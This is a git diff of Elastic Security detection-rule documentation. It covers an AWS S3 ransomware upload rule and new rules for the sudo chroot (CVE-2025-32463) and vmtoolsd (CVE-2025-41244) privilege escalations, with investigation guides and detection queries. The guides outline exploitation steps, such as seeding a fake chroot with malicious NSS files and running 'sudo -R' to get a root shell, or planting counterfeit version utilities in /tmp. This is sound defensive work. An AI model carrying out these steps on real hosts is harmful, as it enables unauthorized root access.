-- **Enhance Monitoring and Alerts**: Adjust monitoring systems to alert on similar `PutObject` actions, especially those involving sensitive data or unusual file extensions. -- **Educate and Train**: Provide additional training to users with administrative rights on the importance of security best practices concerning S3 bucket management and the risks of ransomware. -- **Audit S3 Bucket Policies and Permissions**: Conduct a comprehensive audit of all S3 bucket policies and associated permissions to ensure they adhere to the principle of least privilege. -- **Incident Response**: If there's an indication of malicious intent or a security breach, initiate the incident response protocol to mitigate any damage and prevent future occurrences. +**1. Immediate, low-risk actions (safe for most environments)** +- **Preserve context:** Export the triggering `PutObject` CloudTrail record(s), plus 15–30 min before/after, to an evidence bucket (restricted access). +- **Snapshot configuration:** Record current bucket settings (Block Public Access, Versioning, Object Lock, Bucket Policy, Lifecycle rules) and any KMS keys used. +- **Quiet the spread:** Pause destructive automation: disable/bypass lifecycle rules that would expire/delete object versions; temporarily pause data pipelines targeting the bucket. +- **Notify owners:** Inform the bucket/application owner(s) and security leadership. +**2. Containment options (choose the least disruptive first)** +- **Harden exposure:** If not already enforced, enable `Block Public Access` for the bucket. +- **Targeted deny policy (temporary):** Add a restrictive bucket policy allowing only IR/admin roles while you scope impact. Reconfirm critical workload dependencies before applying. +- **Credential risk reduction:** If a specific IAM user/key or role is implicated, rotate access keys; for roles, remove risky policy attachments or temporarily restrict with an SCP/deny statement. -*Additional Information:* +**3. Evidence preservation** +- Export relevant CloudTrail events, S3 server/access logs (if enabled), AWS Config history for the bucket/policy, and the suspicious object plus its previous versions (if Versioning is enabled). +- Document actor ARN, source IPs, user agent(s), exact `bucketName`/`key`, and timestamps. Maintain a simple chain-of-custody note for collected artifacts. + +**4. Scope and hunting (same actor/time window)** +- Look for `DeleteObject(s)`, unusual `PutObject` volume, `PutBucketPolicy`, `PutPublicAccessBlock`, `PutBucketVersioning` changes, `PutBucketLifecycleConfiguration`, and cross-account access. +- Cross reference other buckets touched by the same actor/IP; recent IAM changes (new keys, policy/role edits); GuardDuty findings tied to S3/credentials. +**5. Recovery (prioritize data integrity)** +- If Versioning is enabled, restore last known-good versions for impacted objects. Consider applying Object Lock legal hold to clean versions during recovery if configured. +- If Versioning is not enabled, recover from backups (AWS Backup, replication targets). Enable Versioning going forward on critical buckets; evaluate Object Lock for high-value data. +- Carefully remove any temporary deny policy only after credentials are rotated, policies re-validated, and no ongoing destructive activity is observed. -For further guidance on managing S3 bucket security and protecting against ransomware, refer to the https://docs.aws.amazon.com/AmazonS3/latest/userguide/Welcome.html[AWS S3 documentation] and AWS best practices for security. 
Additionally, consult the following resources for specific details on S3 ransomware protection: -- https://s3.amazonaws.com/bizzabo.file.upload/PtZzA0eFQwV2RA5ysNeo_ERMETIC%20REPORT%20-%20AWS%20S3%20Ransomware%20Exposure%20in%20the%20Wild.pdf[ERMETIC REPORT - AWS S3 Ransomware Exposure in the Wild] -- https://stratus-red-team.cloud/attack-techniques/AWS/aws.impact.s3-ransomware-batch-deletion/[AWS S3 Ransomware Batch Deletion] -- https://rhinosecuritylabs.com/aws/s3-ransomware-part-1-attack-vector/[S3 Ransomware Part 1: Attack Vector] +**6. Post-incident hardening** +- Enforce `Block Public Access`, enable Versioning (and MFA-Delete where appropriate), and review bucket policies for least privilege. +- Ensure continuous CloudTrail data events for S3 are enabled in covered regions; enable/verify GuardDuty S3 protections and alerts routing. +- Add detections for related behaviors (policy tampering, bulk deletes, versioning/lifecycle toggles) and create allowlists for known maintenance windows. + +**7. Communication & escalation** +- If you have an IR team/provider: escalate with the evidence bundle and a summary (bucket/key, actor, protections, related activity, business impact). +- If you do not have an IR team: designate an internal incident lead, track actions/time, and follow these steps conservatively. Favor reversible controls (temporary deny, key rotation) over invasive changes. + + +*Additional Information:* + +- For further guidance on managing S3 bucket security and protecting against ransomware, refer to the https://docs.aws.amazon.com/AmazonS3/latest/userguide/Welcome.html[AWS S3 documentation] and AWS best practices for security. +- https://github.com/aws-samples/aws-incident-response-playbooks/blob/c151b0dc091755fffd4d662a8f29e2f6794da52c/playbooks/IRP-Ransomware.md[AWS IRP—Ransomware] (NIST-aligned template for evidence, containment, eradication, recovery, post-incident). +- https://github.com/aws-samples/aws-customer-playbook-framework/blob/a8c7b313636b406a375952ac00b2d68e89a991f2/docs/Ransom_Response_S3.md[AWS Customer Playbook—Ransom Response (S3)] (bucket-level response steps: public access blocks, temporary deny, versioning/object lock, lifecycle considerations, recovery). ==== Setup -AWS S3 data types need to be enabled in the CloudTrail trail configuration. +AWS S3 data types need to be enabled in the CloudTrail trail configuration to capture PutObject API calls. 
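+
+To support the "Pivot to related S3 activity" step in the triage guidance above, recent S3 write and policy changes can be summarized per actor. The following ES|QL search is an illustrative sketch only and is not part of the prebuilt rule; it assumes CloudTrail S3 data events are shipped to `logs-aws.cloudtrail-*`, and the list of API actions is an assumption to tailor to your investigation.
+
+[source, js]
+----------------------------------
+// Hypothetical pivot: summarize destructive or policy-tampering S3 calls by actor
+from logs-aws.cloudtrail-*
+| where event.dataset == "aws.cloudtrail"
+  and event.provider == "s3.amazonaws.com"
+  and event.action in ("PutObject", "DeleteObject", "DeleteObjects", "PutBucketPolicy", "PutBucketVersioning", "PutBucketLifecycleConfiguration")
+| stats Esql.event_count = count(*) by aws.cloudtrail.user_identity.arn, event.action, source.ip
+| sort Esql.event_count desc
+| limit 100
+----------------------------------
+
+A single actor showing a burst of `DeleteObjects` followed by `PutObject` activity is the pattern most consistent with the ransomware behavior described above.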
==== Rule query [source, js] ---------------------------------- -from logs-aws.cloudtrail-* - -// any successful uploads via S3 API requests -| where - event.dataset == "aws.cloudtrail" - and event.provider == "s3.amazonaws.com" - and event.action == "PutObject" - and event.outcome == "success" - -// extract object key from API request parameters -| dissect aws.cloudtrail.request_parameters "%{?ignore_values}key=%{Esql.aws_cloudtrail_request_parameters_object_key}}" - -// regex match against common ransomware naming patterns -| where - Esql.aws_cloudtrail_request_parameters_object_key rlike "(.*)(ransom|lock|crypt|enc|readme|how_to_decrypt|decrypt_instructions|recovery|datarescue)(.*)" - and not Esql.aws_cloudtrail_request_parameters_object_key rlike "(.*)(AWSLogs|CloudTrail|access-logs)(.*)" - -// keep relevant ECS and derived fields -| keep - tls.client.server_name, - aws.cloudtrail.user_identity.arn, - Esql.aws_cloudtrail_request_parameters_object_key - -// aggregate by server name, actor, and object key -| stats - Esql.event_count = count(*) - by - tls.client.server_name, - aws.cloudtrail.user_identity.arn, - Esql.aws_cloudtrail_request_parameters_object_key - -// filter for rare single uploads (likely test/detonation) -| where Esql.event_count == 1 +file where + event.dataset == "aws.cloudtrail" and + event.provider == "s3.amazonaws.com" and + event.action == "PutObject" and + event.outcome == "success" and + /* Apply regex to match patterns only after the bucket name */ + aws.cloudtrail.resources.arn regex "arn:aws:s3:::[^/]+/.*?(ransom|lock|crypt|enc|readme|how_to_decrypt|decrypt_instructions|recovery|datarescue).*" and + not aws.cloudtrail.resources.arn regex ".*(AWSLogs|CloudTrail|access-logs).*" ---------------------------------- @@ -151,3 +153,7 @@ from logs-aws.cloudtrail-* ** Name: Data Destruction ** ID: T1485 ** Reference URL: https://attack.mitre.org/techniques/T1485/ +* Technique: +** Name: Data Encrypted for Impact +** ID: T1486 +** Reference URL: https://attack.mitre.org/techniques/T1486/ diff --git a/docs/detections/prebuilt-rules/rule-details/potential-cve-2025-32463-nsswitch-file-creation.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-cve-2025-32463-nsswitch-file-creation.asciidoc new file mode 100644 index 0000000000..f15419a8b5 --- /dev/null +++ b/docs/detections/prebuilt-rules/rule-details/potential-cve-2025-32463-nsswitch-file-creation.asciidoc @@ -0,0 +1,159 @@ +[[potential-cve-2025-32463-nsswitch-file-creation]] +=== Potential CVE-2025-32463 Nsswitch File Creation + +Detects suspicious creation of the nsswitch.conf file, outside of the regular /etc/nsswitch.conf path, consistent with attempts to exploit CVE-2025-32463 (the "sudo chroot" privilege escalation), where an attacker tricks sudo into using attacker-controlled NSS files or libraries to gain root. 
+ +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.file* +* logs-sentinel_one_cloud_funnel.* +* endgame-* +* auditbeat-* +* logs-auditd_manager.auditd-* +* logs-crowdstrike.fdr* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.stratascale.com/vulnerability-alert-CVE-2025-32463-sudo-chroot +* https://github.com/kh4sh3i/CVE-2025-32463 + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Privilege Escalation +* Data Source: Elastic Defend +* Data Source: SentinelOne +* Data Source: Crowdstrike +* Data Source: Elastic Endgame +* Data Source: Auditd Manager +* Use Case: Vulnerability +* Resources: Investigation Guide + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Potential CVE-2025-32463 Nsswitch File Creation* + + +This rule flags creation of an nsswitch.conf file outside the standard /etc location by a shell, an early sign of staging a fake root to coerce sudo's chroot path and hijack NSS resolution (CVE-2025-32463). A common pattern is writing /tmp/chroot/etc/nsswitch.conf, placing or pointing to a malicious NSS module, then running sudo chroot into that directory so name lookups load attacker-controlled code and escalate to root. + + +*Possible investigation steps* + + +- Correlate the event with any sudo or chroot executions within ±10 minutes that reference the same directory prefix (e.g., /tmp/chroot), capturing full command line, user, TTY, working directory, and exit codes. +- Inspect the created nsswitch.conf for nonstandard services or module names and enumerate any libnss_*.so* under lib*/ or usr/lib*/ within that prefix, recording owner, hashes, and timestamps. +- List all contemporaneous file writes under the same prefix (etc, lib*, bin, sbin) to determine whether a chroot rootfs is being assembled and attribute it to a toolchain such as tar, rsync, debootstrap, or custom scripts via process ancestry. +- Search file access telemetry to see whether privileged processes subsequently read that specific nsswitch.conf or loaded libnss_* from the same path, which would indicate the chroot was exercised. +- Verify sudo and glibc versions and patch status for CVE-2025-32463 and collect the initiating user’s session context (SSH source, TTY, shell history) to assess exploitability and scope. + + +*False positive analysis* + + +- An administrator legitimately staging a temporary chroot or test root filesystem may use a shell to create /tmp/*/etc/nsswitch.conf while populating configs, matching the rule even though no privilege escalation is intended. +- OS installation, recovery, or backup-restore workflows run from a shell can populate a mounted target like /mnt/newroot/etc/nsswitch.conf, creating the file outside /etc as part of maintenance and triggering the alert. 
+ + +*Response and remediation* + + +- Terminate any sudo or chroot processes referencing the created path (e.g., /tmp/chroot/etc/nsswitch.conf), lock the initiating user’s sudo access, and quarantine the parent directory with root-only permissions. +- Remove the staged nsswitch.conf and any libnss_*.so* or ld.so.* artifacts under lib*/ or usr/lib*/ within that prefix after collecting copies, hashes, and timestamps for evidence. +- Restore and verify /etc/nsswitch.conf on the host with correct content and root:root 0644, purge temporary chroot roots under /tmp, /var/tmp, or /mnt, and restart nscd or systemd-resolved to flush cached name-service data. +- Escalate to incident response if sudo chroot was executed against the same directory, if root processes loaded libnss_* from that path, or if nsswitch.conf appears outside /etc on multiple hosts within a short window. +- Apply vendor fixes for CVE-2025-32463 to sudo and glibc, disallow chroot in sudoers and enforce env_reset, noexec, and secure_path, and mount /tmp and /var/tmp with noexec,nosuid,nodev to prevent libraries being sourced from user-writable paths. +- Add controls to block execution from user-created chroot trees by policy (AppArmor or SELinux) and create alerts on creation of */etc/nsswitch.conf or libnss_* writes under non-system paths, with auto-isolation for directories under /tmp or a user’s home. + + +==== Setup + + + +*Setup* + + +This rule requires data coming in from Elastic Defend. + + +*Elastic Defend Integration Setup* + +Elastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app. + + +*Prerequisite Requirements:* + +- Fleet is required for Elastic Defend. +- To configure Fleet Server refer to the https://www.elastic.co/guide/en/fleet/current/fleet-server.html[documentation]. + + +*The following steps should be executed in order to add the Elastic Defend integration on a Linux System:* + +- Go to the Kibana home page and click "Add integrations". +- In the query bar, search for "Elastic Defend" and select the integration to see more details about it. +- Click "Add Elastic Defend". +- Configure the integration name and optionally add a description. +- Select the type of environment you want to protect, either "Traditional Endpoints" or "Cloud Workloads". +- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html[Helper guide]. +- We suggest selecting "Complete EDR (Endpoint Detection and Response)" as a configuration setting, that provides "All events; all preventions" +- Enter a name for the agent policy in "New agent policy name". If other agent policies already exist, you can click the "Existing hosts" tab and select an existing policy instead. +For more details on Elastic Agent configuration settings, refer to the https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html[helper guide]. +- Click "Save and Continue". +- To complete the integration, select "Add Elastic Agent to your hosts" and continue to the next section to install the Elastic Agent on your hosts. +For more details on Elastic Defend refer to the https://www.elastic.co/guide/en/security/current/install-endpoint.html[helper guide]. 
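+
+Before reviewing the rule query below, the staging behavior described in the investigation steps (an nsswitch.conf written outside /etc by a shell) can be reviewed fleet-wide. The following ES|QL search is an illustrative sketch only and is not part of the prebuilt rule; the index pattern and field values are assumptions based on Elastic Defend file events and may need tuning for the other data sources listed in the rule indices.
+
+[source, js]
+----------------------------------
+// Hypothetical hunt: nsswitch.conf creations outside the standard /etc location
+from logs-endpoint.events.file*
+| where host.os.type == "linux"
+  and event.type == "creation"
+  and file.path like "/*/etc/nsswitch.conf"
+  and file.path != "/etc/nsswitch.conf"
+| keep @timestamp, host.name, user.name, process.name, process.command_line, file.path
+| sort @timestamp desc
+| limit 100
+----------------------------------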
+ + +==== Rule query + + +[source, js] +---------------------------------- +file where host.os.type == "linux" and event.type == "creation" and file.path like "/*/etc/nsswitch.conf" and +process.name in ("bash", "dash", "sh", "tcsh", "csh", "zsh", "ksh", "fish") and +not ( + process.name == "dash" and file.path like ("/var/tmp/mkinitramfs_*", "/tmp/tmp.*/mkinitramfs_*") +) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Exploitation for Privilege Escalation +** ID: T1068 +** Reference URL: https://attack.mitre.org/techniques/T1068/ diff --git a/docs/detections/prebuilt-rules/rule-details/potential-cve-2025-32463-sudo-chroot-execution-attempt.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-cve-2025-32463-sudo-chroot-execution-attempt.asciidoc new file mode 100644 index 0000000000..988e591f56 --- /dev/null +++ b/docs/detections/prebuilt-rules/rule-details/potential-cve-2025-32463-sudo-chroot-execution-attempt.asciidoc @@ -0,0 +1,159 @@ +[[potential-cve-2025-32463-sudo-chroot-execution-attempt]] +=== Potential CVE-2025-32463 Sudo Chroot Execution Attempt + +Detects suspicious use of sudo's --chroot / -R option consistent with attempts to exploit CVE-2025-32463 (the "sudo chroot" privilege escalation), where an attacker tricks sudo into using attacker-controlled NSS files or libraries to gain root. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.process* +* logs-sentinel_one_cloud_funnel.* +* endgame-* +* auditbeat-* +* logs-auditd_manager.auditd-* +* logs-crowdstrike.fdr* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.stratascale.com/vulnerability-alert-CVE-2025-32463-sudo-chroot +* https://github.com/kh4sh3i/CVE-2025-32463 + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Privilege Escalation +* Data Source: Elastic Defend +* Data Source: SentinelOne +* Data Source: Crowdstrike +* Data Source: Elastic Endgame +* Data Source: Auditd Manager +* Use Case: Vulnerability +* Resources: Investigation Guide + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Potential CVE-2025-32463 Sudo Chroot Execution Attempt* + + +This rule highlights sudo invoked with the chroot (-R/--chroot) option outside normal administration, a behavior tied to CVE-2025-32463 where attackers force sudo to load attacker-controlled NSS configs or libraries and escalate to root. An attacker pattern: running sudo -R /tmp/fakechroot /bin/sh after seeding that directory with malicious nsswitch.conf and libnss to obtain a root shell. Treat unexpected chrooted sudo on Linux hosts as high-risk privilege escalation activity. 
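+
+To scope this behavior across a fleet before diving into a single host, chroot-style sudo invocations can be summarized with a hunting search. The ES|QL sketch below is illustrative only and not part of the prebuilt rule; the index pattern and command-line patterns are assumptions, and the aggregation is simply one way to spot unusual users or targets.
+
+[source, js]
+----------------------------------
+// Hypothetical hunt: sudo invoked with -R/--chroot, grouped by user and command line
+from logs-endpoint.events.process*
+| where host.os.type == "linux"
+  and event.action == "exec"
+  and process.name == "sudo"
+  and (process.command_line like "*sudo -R *" or process.command_line like "*sudo --chroot*")
+| stats Esql.invocation_count = count(*), Esql.host_values = values(host.name) by user.name, process.command_line
+| sort Esql.invocation_count desc
+----------------------------------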
+ + +*Possible investigation steps* + + +- Extract the chroot target path from the event and enumerate its etc and lib directories for attacker-seeded NSS artifacts (nsswitch.conf, libnss_*, ld.so.preload) and fake passwd/group files, noting recent mtime, ownership, and world-writable files. +- Pivot to file-creation and modification telemetry to identify processes and users that populated that path shortly before execution (e.g., curl, wget, tar, git, gcc), linking them to the invoking user to establish intent. +- Review session and process details to see if a shell or interpreter was launched inside the chroot and whether an euid transition to 0 occurred, indicating a successful privilege escalation. +- Confirm sudo’s package version and build options and the user’s sudoers policy (secure_path/env_* settings and any NOPASSWD allowances) to assess exploitability and whether chroot usage was authorized. +- Collect and preserve the chroot directory contents and relevant audit/log artifacts, and scope by searching for similar chroot invocations or NSS file seeds across the host and fleet. + + +*False positive analysis* + + +- A legitimate offline maintenance session where an administrator chroots into a mounted system under /mnt or /srv using sudo --chroot to run package or initramfs commands, which will trigger when the invoked program is not in the whitelist. +- An image-building or OS bootstrap workflow that stages a root filesystem and uses sudo -R to execute a shell or build/configuration scripts inside the chroot, producing the same pattern from a known user or host context. + + +*Response and remediation* + + +- Immediately isolate the affected host from the network, revoke the invoking user’s sudo privileges, and terminate any chrooted shells or child processes spawned via “sudo -R /bin/sh” or similar executions. +- Preserve evidence and then remove attacker-seeded NSS and loader artifacts within the chroot path—delete or replace nsswitch.conf, libnss_*.so, ld.so.preload, passwd, and group files, and clean up world-writable staging directories like /tmp/fakechroot. +- Upgrade sudo to a fixed build that addresses CVE-2025-32463, and recover by restoring any modified system NSS and loader files from known-good backups while validating ownership, permissions, and hashes. +- Escalate to full incident response if a root shell or process with euid 0 is observed, if /etc/ld.so.preload or /lib/libnss_*.so outside the chroot show unauthorized changes, or if similar “sudo -R” executions appear across multiple hosts. +- Harden by updating sudoers to remove NOPASSWD for chrooted commands, enforce Defaults env_reset and secure_path with noexec, disable “--chroot” usage for non-admin workflows, and monitor for creation of libnss_*.so or nsswitch.conf in non-standard directories. +- Add platform controls by enabling SELinux/AppArmor policies on sudo and the dynamic loader, applying nodev,nosuid,noexec mounts to /tmp and build paths, and setting immutability (chattr +i) on /etc/nsswitch.conf where operationally feasible. + + +==== Setup + + + +*Setup* + + +This rule requires data coming in from Elastic Defend. + + +*Elastic Defend Integration Setup* + +Elastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app. + + +*Prerequisite Requirements:* + +- Fleet is required for Elastic Defend. 
+- To configure Fleet Server refer to the https://www.elastic.co/guide/en/fleet/current/fleet-server.html[documentation]. + + +*The following steps should be executed in order to add the Elastic Defend integration on a Linux System:* + +- Go to the Kibana home page and click "Add integrations". +- In the query bar, search for "Elastic Defend" and select the integration to see more details about it. +- Click "Add Elastic Defend". +- Configure the integration name and optionally add a description. +- Select the type of environment you want to protect, either "Traditional Endpoints" or "Cloud Workloads". +- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html[Helper guide]. +- We suggest selecting "Complete EDR (Endpoint Detection and Response)" as a configuration setting, that provides "All events; all preventions" +- Enter a name for the agent policy in "New agent policy name". If other agent policies already exist, you can click the "Existing hosts" tab and select an existing policy instead. +For more details on Elastic Agent configuration settings, refer to the https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html[helper guide]. +- Click "Save and Continue". +- To complete the integration, select "Add Elastic Agent to your hosts" and continue to the next section to install the Elastic Agent on your hosts. +For more details on Elastic Defend refer to the https://www.elastic.co/guide/en/security/current/install-endpoint.html[helper guide]. + + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "linux" and event.type == "start" and +event.action in ("exec", "exec_event", "start", "executed", "process_started", "ProcessRollup2") and +process.name == "sudo" and process.args in ("-R", "--chroot") and +// To enforce the -R and --chroot arguments to be for sudo specifically, while wildcarding potential full sudo paths +process.command_line like ("*sudo -R*", "*sudo --chroot*") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Exploitation for Privilege Escalation +** ID: T1068 +** Reference URL: https://attack.mitre.org/techniques/T1068/ diff --git a/docs/detections/prebuilt-rules/rule-details/potential-cve-2025-41244-vmtoolsd-lpe-exploitation-attempt.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-cve-2025-41244-vmtoolsd-lpe-exploitation-attempt.asciidoc new file mode 100644 index 0000000000..ea109e2472 --- /dev/null +++ b/docs/detections/prebuilt-rules/rule-details/potential-cve-2025-41244-vmtoolsd-lpe-exploitation-attempt.asciidoc @@ -0,0 +1,164 @@ +[[potential-cve-2025-41244-vmtoolsd-lpe-exploitation-attempt]] +=== Potential CVE-2025-41244 vmtoolsd LPE Exploitation Attempt + +This rule looks for processes that behave like an attacker trying to exploit a known vulnerability in VMware tools (CVE-2025-41244). The vulnerable behavior involves the VMware tools service or its discovery scripts executing other programs to probe their version strings. An attacker can place a malicious program in a writable location (for example /tmp) and have the tools execute it with elevated privileges, resulting in local privilege escalation. 
The rule flags launches where vmtoolsd or the service discovery scripts start other child processes. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.process* +* logs-sentinel_one_cloud_funnel.* +* endgame-* +* auditbeat-* +* logs-auditd_manager.auditd-* +* logs-crowdstrike.fdr* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://blog.nviso.eu/2025/09/29/you-name-it-vmware-elevates-it-cve-2025-41244/ + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Privilege Escalation +* Data Source: Elastic Defend +* Data Source: SentinelOne +* Data Source: Crowdstrike +* Data Source: Elastic Endgame +* Data Source: Auditd Manager +* Use Case: Vulnerability +* Resources: Investigation Guide + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Potential CVE-2025-41244 vmtoolsd LPE Exploitation Attempt* + + +This rule flags child processes started by vmtoolsd or its version-checking script on Linux, behavior central to CVE-2025-41244 where the service executes external utilities to read version strings. It matters because a local user can coerce these invocations to run arbitrary code with elevated privileges. A typical pattern is dropping a counterfeit lsb_release or rpm in /tmp, modifying PATH, and triggering vmtoolsd/get-versions.sh so the rogue binary executes and spawns a privileged shell or installer. + + +*Possible investigation steps* + + +- Examine the executed child binary’s full path and location, flagging any binaries in writable directories (e.g., /tmp, /var/tmp, /dev/shm, or user home) or masquerading as version utilities (lsb_release, rpm, dpkg, dnf, pacman), and record owner, size, hash, and recent timestamps. +- Pull the parent’s and child’s command-line and environment to confirm PATH ordering and whether writable paths precede system binaries, capturing any evidence that get-versions.sh or vmtoolsd invoked a non-standard utility. +- Pivot to subsequent activity from the child process to see if it spawns an interactive shell, escalates EUID to root, touches /etc/sudoers or /etc/passwd, writes to privileged directories, or opens outbound connections. +- Verify integrity of open-vm-tools components by comparing hashes and file sizes of vmtoolsd and serviceDiscovery scripts with vendor packages (rpm -V or dpkg --verify) and checking for unexpected edits, symlinks, or PATH-hijackable calls within the scripts. +- Correlate filesystem creation events and terminal histories to identify the user who dropped or modified the suspicious binary and whether it appeared shortly before the alert, then assess other hosts for the same filename or hash to determine spread. 
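+
+The first two steps above can be approximated fleet-wide by hunting for vmtoolsd children that execute from writable locations. The following ES|QL search is an illustrative sketch only and not part of the prebuilt rule; the index pattern and the list of writable paths are assumptions to adapt to your environment.
+
+[source, js]
+----------------------------------
+// Hypothetical hunt: children of vmtoolsd executing from user-writable paths
+from logs-endpoint.events.process*
+| where host.os.type == "linux"
+  and event.action == "exec"
+  and process.parent.name == "vmtoolsd"
+  and (process.executable like "/tmp/*"
+    or process.executable like "/var/tmp/*"
+    or process.executable like "/dev/shm/*"
+    or process.executable like "/home/*")
+| keep @timestamp, host.name, user.name, process.executable, process.command_line, process.parent.command_line
+| sort @timestamp desc
+| limit 100
+----------------------------------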
+ + +*False positive analysis* + + +- Routine vmtoolsd service discovery via get-versions.sh during VM boot or periodic guest info refresh can legitimately spawn version/package utilities from standard system paths with a default PATH and no execution from writable directories, yet still match this rule. +- Administrator troubleshooting or post-update validation of open-vm-tools—manually running get-versions.sh or restarting vmtoolsd—can cause a shell to launch the script and start expected system utilities in trusted locations, producing a benign alert. + + +*Response and remediation* + + +- Isolate the affected VM, stop the vmtoolsd service, terminate its spawned children (e.g., lsb_release, rpm, dpkg, or /bin/sh launched via open-vm-tools/serviceDiscovery/scripts/get-versions.sh), and temporarily remove execute permissions from the serviceDiscovery scripts to halt exploitation. +- Quarantine and remove any counterfeit or hijacked utilities and symlinks in writable locations (/tmp, /var/tmp, /dev/shm, or user home) that were executed by vmtoolsd/get-versions.sh, capturing full paths, hashes, owners, and timestamps for evidence. +- Recover by reinstalling open-vm-tools from a trusted repository and verifying integrity of vmtoolsd and serviceDiscovery scripts (rpm -V or dpkg --verify), then restart vmtoolsd only after confirming PATH does not include writable directories and that the scripts call absolute binaries under /usr/bin. +- Escalate to full incident response if a vmtoolsd child executed from a writable path ran with EUID 0, spawned an interactive shell (/bin/sh or /bin/bash), or modified /etc/sudoers or /etc/passwd, and initiate credential rotation and a host-wide compromise assessment. +- Harden hosts by enforcing a safe PATH (e.g., /usr/sbin:/usr/bin:/sbin:/bin), removing writable directories from system and user environment files, mounting /tmp,/var/tmp,/dev/shm with noexec,nosuid,nodev, and applying AppArmor/SELinux policies to block vmtoolsd from executing binaries outside system directories. +- Prevent recurrence by deploying the vendor fix for CVE-2025-41244 across all Linux VMs, pinning or replacing the open-vm-tools serviceDiscovery scripts with versions that use absolute paths, and adding EDR allowlists/blocks so vmtoolsd cannot launch binaries from writable paths. + + +==== Setup + + + +*Setup* + + +This rule requires data coming in from Elastic Defend. + + +*Elastic Defend Integration Setup* + +Elastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app. + + +*Prerequisite Requirements:* + +- Fleet is required for Elastic Defend. +- To configure Fleet Server refer to the https://www.elastic.co/guide/en/fleet/current/fleet-server.html[documentation]. + + +*The following steps should be executed in order to add the Elastic Defend integration on a Linux System:* + +- Go to the Kibana home page and click "Add integrations". +- In the query bar, search for "Elastic Defend" and select the integration to see more details about it. +- Click "Add Elastic Defend". +- Configure the integration name and optionally add a description. +- Select the type of environment you want to protect, either "Traditional Endpoints" or "Cloud Workloads". +- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. 
https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html[Helper guide]. +- We suggest selecting "Complete EDR (Endpoint Detection and Response)" as a configuration setting, that provides "All events; all preventions" +- Enter a name for the agent policy in "New agent policy name". If other agent policies already exist, you can click the "Existing hosts" tab and select an existing policy instead. +For more details on Elastic Agent configuration settings, refer to the https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html[helper guide]. +- Click "Save and Continue". +- To complete the integration, select "Add Elastic Agent to your hosts" and continue to the next section to install the Elastic Agent on your hosts. +For more details on Elastic Defend refer to the https://www.elastic.co/guide/en/security/current/install-endpoint.html[helper guide]. + + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "linux" and event.type == "start" and +event.action in ("exec", "exec_event", "start", "executed", "process_started", "ProcessRollup2") and +( + ( + process.parent.name == "vmtoolsd" + ) or + ( + process.parent.name in ("bash", "dash", "sh", "tcsh", "csh", "zsh", "ksh", "fish") and + ?process.parent.args like ("/*/open-vm-tools/serviceDiscovery/scripts/get-versions.sh") + ) +) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Exploitation for Privilege Escalation +** ID: T1068 +** Reference URL: https://attack.mitre.org/techniques/T1068/ diff --git 